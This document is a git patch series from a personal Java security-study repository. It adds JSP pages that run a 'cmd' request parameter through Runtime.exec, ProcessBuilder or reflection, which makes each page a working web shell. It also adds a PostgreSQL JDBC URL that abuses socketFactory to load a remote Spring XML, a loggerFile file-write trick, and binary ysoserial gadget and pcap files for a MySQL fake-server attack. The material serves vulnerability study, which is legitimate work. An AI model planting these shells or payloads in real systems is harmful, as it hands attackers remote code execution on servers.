language="java" %> - - - $Title$ - - - $END$ - - +<% + // 漏洞触发点 + String cmd = request.getParameter("cmd"); + InputStream in = new ProcessBuilder(cmd).start().getInputStream(); + + ByteArrayOutputStream results = new ByteArrayOutputStream(); + + int l = -1; + byte[] b = new byte[1024]; + while ((l = in.read(b)) != -1) { + results.write(b, 0, l); + } + + out.println(results); +%> \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" index eb37888..3bf43c4 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" @@ -5,12 +5,26 @@ Time: 12:50 To change this template use File | Settings | File Templates. --%> +<%@ page import="java.io.BufferedReader" %> +<%@ page import="java.io.InputStreamReader" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> - - - $Title$ - - - $END$ - - +<% + // 漏洞触发点 + String cmd = request.getParameter("cmd"); + + BufferedReader in = new BufferedReader( + new InputStreamReader( + Runtime.getRuntime().exec(cmd).getInputStream(), + "UTF-8" + ) + ); + + String line; + StringBuilder results = new StringBuilder(); + while ((line = in.readLine()) != null) { + results.append(line); + } + in.close(); + + out.print(results); +%> diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" index 83d527d..ba1cffa 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" @@ -5,12 +5,50 @@ Time: 12:56 To change this template use File | Settings | File Templates. --%> +<%@ page import="java.lang.reflect.Constructor" %> +<%@ page import="java.lang.reflect.Method" %> +<%@ page import="java.io.InputStream" %> +<%@ page import="java.io.ByteArrayOutputStream" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> - - - $Title$ - - - $END$ - - +<% + // 漏洞触发点 + String c = request.getParameter("cmd"); + + // 根据系统自动调用对应命令 + String[] cmd; + String osName = System.getProperties().getProperty("os.name"); + if (osName.toLowerCase().contains("windows")) { + cmd = new String[]{"cmd", "/c", c}; + } else { + cmd = new String[]{"/bin/bash", "-c", c}; + } + + // 获取Runtime类对象 + Class runtimeClass = Class.forName("java.lang.Runtime"); + + // 获取构造方法 + Constructor runtimeConstructor = runtimeClass.getDeclaredConstructor(); + runtimeConstructor.setAccessible(true); + + // 创建Runtime类实例 相当于 Runtime r = new Runtime(); + Object runtimeInstance = runtimeConstructor.newInstance(); + + // 获取Runtime的exec(String cmd)方法 + Method runtimeMethod = runtimeClass.getMethod("exec", String[].class); + + // 调用exec方法 等于 r.exec(cmd); cmd参数输入要执行的命令 + Process p = (Process) runtimeMethod.invoke(runtimeInstance, new Object[]{cmd}); + + // 获取命令执行结果 + InputStream in = p.getInputStream(); + + ByteArrayOutputStream results = new ByteArrayOutputStream(); + byte[] b = new byte[1024]; + int l = -1; + + while ((l = in.read(b)) != -1) { + results.write(b, 0, l); + } + + out.print(results); +%> diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" new file mode 100644 index 0000000..c2365ab --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" new file mode 100644 index 0000000..3737817 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" @@ -0,0 +1,25 @@ + + + 4.0.0 + + com.test + ReflectionStudy + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.apache.commons + commons-io + 1.3.2 + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" index 0133f80..c54b471 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" @@ -1,4 +1,62 @@ package com.test.pojo; public class Baka { + public String name; + protected int gender; + private int age; + + public Baka() { + System.out.println("Baka⑨"); + } + + public Baka(String name, int gender, int age) { + this.name = name; + this.gender = gender; + this.age = age; + System.out.println(name + " " + gender + " " + age); + } + + public static void sit(String name) { + System.out.println("sit " + name); + } + + public void hello(String name) { + System.out.println("hello " + name); + } + + protected void hug(String name) { + System.out.println("hug " + name); + } + + private void kiss(String name) { + System.out.println("kiss " + name); + } + + private void kiss(String alias, String name) { + System.out.println("kiss " + alias + "(" + name + ")"); + } + + public String getName() { + return name; + } + + public void setName(String name) { + this.name = name; + } + + public int getGender() { + return gender; + } + + public void setGender(int gender) { + this.gender = gender; + } + + public int getAge() { + return age; + } + + public void setAge(int age) { + this.age = age; + } } diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" index b09825a..2842be7 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" @@ -1,4 +1,21 @@ package com.test.study; +import org.apache.commons.io.IOUtils; + +import java.io.IOException; +import java.io.InputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationTargetException; + public class Reflection2Runtime { + public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException { + Class aClass = Class.forName("java.lang.Runtime"); + Constructor declaredConstructor = aClass.getDeclaredConstructor(); + declaredConstructor.setAccessible(true); + Runtime runtime = (Runtime) declaredConstructor.newInstance(); + runtime.exec("calc"); + + InputStream inputStream = Runtime.getRuntime().exec("whoami").getInputStream(); + System.out.println(IOUtils.toString(inputStream)); + } } diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" index 8227c82..c0260d8 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" @@ -1,4 +1,84 @@ package com.test.study; +import com.test.pojo.Baka; + +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; + public class ReflectionMethods { + public static void main(String[] args) throws Exception { + getField(); + } + + public static void getMethod() throws Exception { + Baka baka = new Baka(); + + Class aClass = Class.forName("com.test.pojo.Baka"); + // 获取所有public方法,包括父类的 + Method[] methods = aClass.getMethods(); + for (Method method : methods) { + System.out.println(method.getName()); + } + + System.out.println("================================"); + + // 获取自己类的所有方法 + Method[] declaredMethods = aClass.getDeclaredMethods(); + for (Method method : declaredMethods) { + System.out.println(method.getName()); + } + + Method method = aClass.getDeclaredMethod("kiss", String.class); + // 临时设置私有方法可访问 + method.setAccessible(true); + method.invoke(baka, "1diot9"); + + Method method1 = aClass.getDeclaredMethod("kiss", String.class, String.class); + method1.setAccessible(true); + method1.invoke(baka, "baka", "1diot9"); + + Method method2 = aClass.getMethod("sit", String.class); + // static方法可以不写obj参数 + method2.invoke(null, "here"); + } + + public static void getConstructor() throws Exception { + Baka baka = new Baka(); + Class aClass = Class.forName("com.test.pojo.Baka"); + Constructor[] constructors = aClass.getConstructors(); + for (Constructor constructor : constructors) { + System.out.println(constructor.getName()); + } + + + Constructor constructor = aClass.getDeclaredConstructor(String.class, int.class, int.class); + constructor.setAccessible(true); + constructor.newInstance("1diot9", 0, 1); + + Constructor constructor1 = aClass.getConstructor(); + constructor1.setAccessible(true); + constructor1.newInstance(); + } + + public static void getField() throws Exception { + Baka baka = new Baka(); + Class aClass = Class.forName("com.test.pojo.Baka"); + Field[] fields = aClass.getDeclaredFields(); + for (Field field : fields) { + System.out.println(field.getName()); + } + + baka.setName("1diot9"); + + Field field = aClass.getDeclaredField("name"); + field.setAccessible(true); + // 反射修改字段 + field.set(baka, "anything"); + Object o = field.get(baka); + System.out.println(o); + + + } } diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" index 66b6977..9f437d1 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" @@ -1,4 +1,19 @@ package com.test.study; +import com.test.pojo.Baka; + public class Ways2Class { + public static void main(String[] args) throws ClassNotFoundException { + Baka baka = new Baka(); + + Class aClass = baka.getClass(); + + Class aClass1 = Class.forName("com.test.pojo.Baka"); + + Class aClass2 = Baka.class; + + System.out.println(aClass.equals(aClass1)); + System.out.println(aClass.equals(aClass2)); + System.out.println(aClass1.equals(aClass2)); + } } From 48772cf5e6e059a4a49eb1a402a7fc09ac430bcd Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Tue, 30 Sep 2025 13:26:30 +0800 Subject: [PATCH 03/16] =?UTF-8?q?=E6=9B=B4=E6=96=B0JDBC-PostgreSql?= =?UTF-8?q?=E5=88=A9=E7=94=A8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- JDBC/PostgreSql/.gitignore | 38 +++++++++++++++++++ JDBC/PostgreSql/.idea/.gitignore | 8 ++++ JDBC/PostgreSql/.idea/encodings.xml | 7 ++++ JDBC/PostgreSql/.idea/misc.xml | 14 +++++++ JDBC/PostgreSql/.idea/vcs.xml | 6 +++ JDBC/PostgreSql/log.txt | 10 +++++ JDBC/PostgreSql/pom.xml | 30 +++++++++++++++ JDBC/PostgreSql/src/main/java/Calc.java | 4 -- .../src/main/java/com/test/DirectConnect.java | 11 ++++++ JDBC/PostgreSql/src/main/java/tmp.java | 4 -- 10 files changed, 124 insertions(+), 8 deletions(-) create mode 100644 JDBC/PostgreSql/.gitignore create mode 100644 JDBC/PostgreSql/.idea/.gitignore create mode 100644 JDBC/PostgreSql/.idea/encodings.xml create mode 100644 JDBC/PostgreSql/.idea/misc.xml create mode 100644 JDBC/PostgreSql/.idea/vcs.xml create mode 100644 JDBC/PostgreSql/log.txt create mode 100644 JDBC/PostgreSql/pom.xml delete mode 100644 JDBC/PostgreSql/src/main/java/Calc.java delete mode 100644 JDBC/PostgreSql/src/main/java/tmp.java diff --git a/JDBC/PostgreSql/.gitignore b/JDBC/PostgreSql/.gitignore new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ b/JDBC/PostgreSql/.gitignore @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/JDBC/PostgreSql/.idea/.gitignore b/JDBC/PostgreSql/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/JDBC/PostgreSql/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/JDBC/PostgreSql/.idea/encodings.xml b/JDBC/PostgreSql/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/JDBC/PostgreSql/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/.idea/misc.xml b/JDBC/PostgreSql/.idea/misc.xml new file mode 100644 index 0000000..d23f859 --- /dev/null +++ b/JDBC/PostgreSql/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/.idea/vcs.xml b/JDBC/PostgreSql/.idea/vcs.xml new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ b/JDBC/PostgreSql/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/log.txt b/JDBC/PostgreSql/log.txt new file mode 100644 index 0000000..2d34e22 --- /dev/null +++ b/JDBC/PostgreSql/log.txt @@ -0,0 +1,10 @@ +九月 25, 2025 1:01:07 下午 org.postgresql.Driver connect +详细: Connecting with URL: jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=log.txt +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection +详细: PostgreSQL JDBC Driver 42.3.0 +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection setDefaultFetchSize +详细: setDefaultFetchSize = 0 +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection setPrepareThreshold +详细: setPrepareThreshold = 5 +九月 25, 2025 1:11:18 下午 org.postgresql.core.v3.ConnectionFactoryImpl openConnectionImpl +详细: Trying to establish a protocol version 3 connection to FileWrite:5432 diff --git a/JDBC/PostgreSql/pom.xml b/JDBC/PostgreSql/pom.xml new file mode 100644 index 0000000..3ca70dd --- /dev/null +++ b/JDBC/PostgreSql/pom.xml @@ -0,0 +1,30 @@ + + + 4.0.0 + + com.test + PostgreSql + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + org.postgresql + postgresql + 42.3.0 + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/src/main/java/Calc.java b/JDBC/PostgreSql/src/main/java/Calc.java deleted file mode 100644 index 457adbd..0000000 --- a/JDBC/PostgreSql/src/main/java/Calc.java +++ /dev/null @@ -1,4 +0,0 @@ -package PACKAGE_NAME; - -public class Calc { -} diff --git a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java index 2f55059..b197cc3 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java +++ b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java @@ -1,4 +1,15 @@ package com.test; +import org.postgresql.Driver; + +import java.sql.SQLException; + public class DirectConnect { + public static void main(String[] args) throws SQLException { + Driver driver = new Driver(); + String url = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:7777/1.xml"; + String url1 = "jdbc:postgresql://127.0.0.1:7777/test/"; + String url2 = "jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=log.txt"; + driver.connect(url, null); + } } diff --git a/JDBC/PostgreSql/src/main/java/tmp.java b/JDBC/PostgreSql/src/main/java/tmp.java deleted file mode 100644 index 9cd2166..0000000 --- a/JDBC/PostgreSql/src/main/java/tmp.java +++ /dev/null @@ -1,4 +0,0 @@ -package PACKAGE_NAME; - -public class tmp { -} From 31cbe949036cec5d3dc9585e2879a31075cf66e0 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Sun, 12 Oct 2025 14:21:36 +0800 Subject: [PATCH 04/16] =?UTF-8?q?doc:=20=E6=96=87=E6=A1=A3=E6=9B=B4?= =?UTF-8?q?=E6=96=B0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../src/main/java/com/read/FileRead.java | 4 ++ CodeAudit/BasicVulStudy/FileWRD/test.txt | 0 JDBC/PostgreSql/ascii.jar | Bin 0 -> 1140 bytes JDBC/PostgreSql/origin.jar | Bin 0 -> 412 bytes .../main/java/com/test/StartApplication.java | 4 ++ .../src/main/java/com/test/UrlEncodeFile.java | 4 ++ .../com/test/controller/IndexController.java | 4 ++ .../src/main/java/com/test/exp/FileWrite.java | 4 ++ .../main/java/com/test/exp/SocketFactory.java | 4 ++ .../src/main/resources/application.yml | 0 JDBC/mysql/SpringTarget/pom.xml | 17 ++++++++ .../src/main/resources/application.yml | 0 JDBC/mysql/YsoserialGadgetGenerate.bin | Bin 0 -> 4060 bytes JDBC/mysql/cc5.pcap | Bin 0 -> 1822 bytes JDBC/mysql/final.pcap | 17 ++++++++ JDBC/mysql/hex.pcap | Bin 0 -> 5188 bytes JDBC/mysql/hex1.pcap | Bin 0 -> 4060 bytes JDBC/mysql/mysql.pcap | Bin 0 -> 1822 bytes JDBC/mysql/no-outbound/pom.xml | 17 ++++++++ .../no-outbound/src/main/java/exp/Exp.java | 4 ++ PyCharm/JDBC/Mysql/convert.py | 0 PyCharm/JDBC/Mysql/fakeServer.py | 0 PyCharm/JDBC/Mysql/fakeServerM4x.py | 0 PyCharm/JDBC/Mysql/hex.txt | 0 README.md | 38 +++++++++--------- 25 files changed, 97 insertions(+), 20 deletions(-) create mode 100644 CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java create mode 100644 CodeAudit/BasicVulStudy/FileWRD/test.txt create mode 100644 JDBC/PostgreSql/ascii.jar create mode 100644 JDBC/PostgreSql/origin.jar create mode 100644 JDBC/PostgreSql/src/main/java/com/test/StartApplication.java create mode 100644 JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java create mode 100644 JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java create mode 100644 JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java create mode 100644 JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java create mode 100644 JDBC/PostgreSql/src/main/resources/application.yml create mode 100644 JDBC/mysql/SpringTarget/pom.xml create mode 100644 JDBC/mysql/SpringTarget/src/main/resources/application.yml create mode 100644 JDBC/mysql/YsoserialGadgetGenerate.bin create mode 100644 JDBC/mysql/cc5.pcap create mode 100644 JDBC/mysql/final.pcap create mode 100644 JDBC/mysql/hex.pcap create mode 100644 JDBC/mysql/hex1.pcap create mode 100644 JDBC/mysql/mysql.pcap create mode 100644 JDBC/mysql/no-outbound/pom.xml create mode 100644 JDBC/mysql/no-outbound/src/main/java/exp/Exp.java create mode 100644 PyCharm/JDBC/Mysql/convert.py create mode 100644 PyCharm/JDBC/Mysql/fakeServer.py create mode 100644 PyCharm/JDBC/Mysql/fakeServerM4x.py create mode 100644 PyCharm/JDBC/Mysql/hex.txt diff --git a/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java b/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java new file mode 100644 index 0000000..44d6f2d --- /dev/null +++ b/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java @@ -0,0 +1,4 @@ +package com.read; + +public class FileRead { +} diff --git a/CodeAudit/BasicVulStudy/FileWRD/test.txt b/CodeAudit/BasicVulStudy/FileWRD/test.txt new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/PostgreSql/ascii.jar b/JDBC/PostgreSql/ascii.jar new file mode 100644 index 0000000000000000000000000000000000000000..7561305dd935569d34786439914ec61d9bc7a82e GIT binary patch literal 1140 zcmds1-EY${5cj^`_we*p=lsu1F_u1nNdNjneM(3C|qbFDdZ+9q)g%ewySxK1~X z!G!wCNw&}D``wpMH^fKBF986jb^-7@64$540DL?G;Kbfr?|!IjYq+Ur!MVU_12Wc&p(#`vhJD&tqELa4HbWfxW3`0Xu~#(3^TXa-Sq zx5+S^E5Xt_&dE(MCQ!w?4%2v@lb>I|7b61iE^a3gRXk?UYR4=mUF&2eWs)QT^M%#@ zCU~ZjT9iR8){^P2%D8k8ayx+yIqYh~(%x_8`Uj(|3H)JRKB{LJR)z14-Nr%ept8(^02wlF~lb?8p#1@ LTjs5uEdcxik4r{! literal 0 HcmV?d00001 diff --git a/JDBC/PostgreSql/origin.jar b/JDBC/PostgreSql/origin.jar new file mode 100644 index 0000000000000000000000000000000000000000..86bf5fbfe20e7ba38226df51cb920c11be77099e GIT binary patch literal 412 zcmWIWW@Zs#U|`^2C|=YawZ#8v4G$v&Lo^cu11nI}P_H64XX*rB?;{2RZST2%%R9aE z-BmU5QrW@g<)SR2d(JJ}*t^X0-G6>%BudZ+O63y#4~AuS;WP2zZX8JnU~(y%zdkzeeayLzf-Plm2p+C zejvE;HgBi?#-mNI#O?39JyAPf{^#w-4>A{hB)=rI#JoHpn)&V^*N6LM=g(^2iCO&A zbHdRU-5VFIY9;a=LxL|p^ys|M@K8nGfbnud)VC*VCUksXe5to&ipJuaYu@*7I<#z^ zW6$4pxP^E3uE2`dMg?zIe!YB+>u*%_YvC7x*B0e_$sIl|rT1?t#|3d0ReQ+@?s{px z#}}O@F|FCp5a7+oWY2&rz*K-i1_BCT5*mD5P%a~b1jE1iogv$o-v)*-DhTjqWdn&Y M0%16i)(5Kq0Py6VumAu6 literal 0 HcmV?d00001 diff --git a/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java new file mode 100644 index 0000000..782a11a --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java @@ -0,0 +1,4 @@ +package com.test; + +public class StartApplication { +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java new file mode 100644 index 0000000..da75283 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java @@ -0,0 +1,4 @@ +package com.test; + +public class UrlEncodeFile { +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java new file mode 100644 index 0000000..ce5482e --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java @@ -0,0 +1,4 @@ +package com.test.controller; + +public class IndexController { +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java new file mode 100644 index 0000000..d233770 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java @@ -0,0 +1,4 @@ +package com.test.exp; + +public class FileWrite { +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java new file mode 100644 index 0000000..df0ced7 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java @@ -0,0 +1,4 @@ +package com.test.exp; + +public class SocketFactory { +} diff --git a/JDBC/PostgreSql/src/main/resources/application.yml b/JDBC/PostgreSql/src/main/resources/application.yml new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/SpringTarget/pom.xml b/JDBC/mysql/SpringTarget/pom.xml new file mode 100644 index 0000000..bf38253 --- /dev/null +++ b/JDBC/mysql/SpringTarget/pom.xml @@ -0,0 +1,17 @@ + + + 4.0.0 + + com.test + SpringTarget + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + \ No newline at end of file diff --git a/JDBC/mysql/SpringTarget/src/main/resources/application.yml b/JDBC/mysql/SpringTarget/src/main/resources/application.yml new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/YsoserialGadgetGenerate.bin b/JDBC/mysql/YsoserialGadgetGenerate.bin new file mode 100644 index 0000000000000000000000000000000000000000..795c3f61f528717738597e9b4c2a86449ce8f373 GIT binary patch literal 4060 zcmb7HeQX@X6@Ry9#~+Em;*hTn=h)4e5NfqB-krN!vR};3 z`tAZ$P^m=%sijpA0@M;A{sSsiRn@8zLa3!wia>4Ds#OqDRS9SXNbNtRl>+H|vmdu- zI}JU{v%B-&`@N5O^XAPo0Q8RQqxwF40m#Ka=zHM?4Z2$sxtyXWgVPKiuAjhJ=4Y$J%6u5+X0Fat*QI~Q{E2$kVs*y9=sGR`oJ|hc$+YjsV zV`F2NUhRMRW9SS7==ZZ_*3cd1vMP7DEA_+7EJ`V?rBL#d%ntcv!=G#z+?ST;{^5g* zFB!K?9nv6Ig8VYGC2TAaM8RfmwJ^7IKR4t=L%=Xi>NKgR!oU0Uy02`X*zs$OL_5bq zO?Y*-Wb;4%W_(%1;GsDxOOoERZa<$w(=YyHwB^Z3k2k5YBjFlU?dhw%Py3x03GxnfNw&#ABqGs za&K%kU!$bIkA{941`yH(sAB;1;!+@SN#)^CO3#%r+&&S* z4Oc9|i)%yn?3Hlil_5u_nQPiykS|+k*p%3k`vK-rR`4jVu+WZ8ne|MLdt%G#No5lu zZB3E#^tpqEoe~q3%lRnvQigRB_GDH0Hmm4MEU*mRr8q|JQ$})^3tX}_X5(1&IUa7N z6C6t!CU>G?+Y`8LNQ2JmlG4EUT&w{S`qTGVe#jS|fg59%U?!K5DZ$wAFA1BoRvt@b zB@DDa(g5sEB)6U;-*2K}7v@5&p$)wIwRQtt-0{j)G%$WoarY*;!`rgBL#7q@Od2%> zJmdIw!q@#D;?rp;&@h$|HdeC$eQf{<&+yH09;ncjtZGfxIgLkSby4yZ(0+k+O5m1R z9lN2QlcEEu1!-u89%?7-PtTxS8CPN1tn{y-0k~;?Y~04DgnO9qo&jq&J?# zoS9g2R93Xl#$nj(hmJqzM&$xa{*+}?P*QUw={iNjJ(zREtgwO>E79n5v9g>BHszeQ zxM0GlVW$=|tD`W1?QOxP3}0`d(c66~K?O6CB*GM))w`7Ubn;_)OpnKryIjXJt%^lW 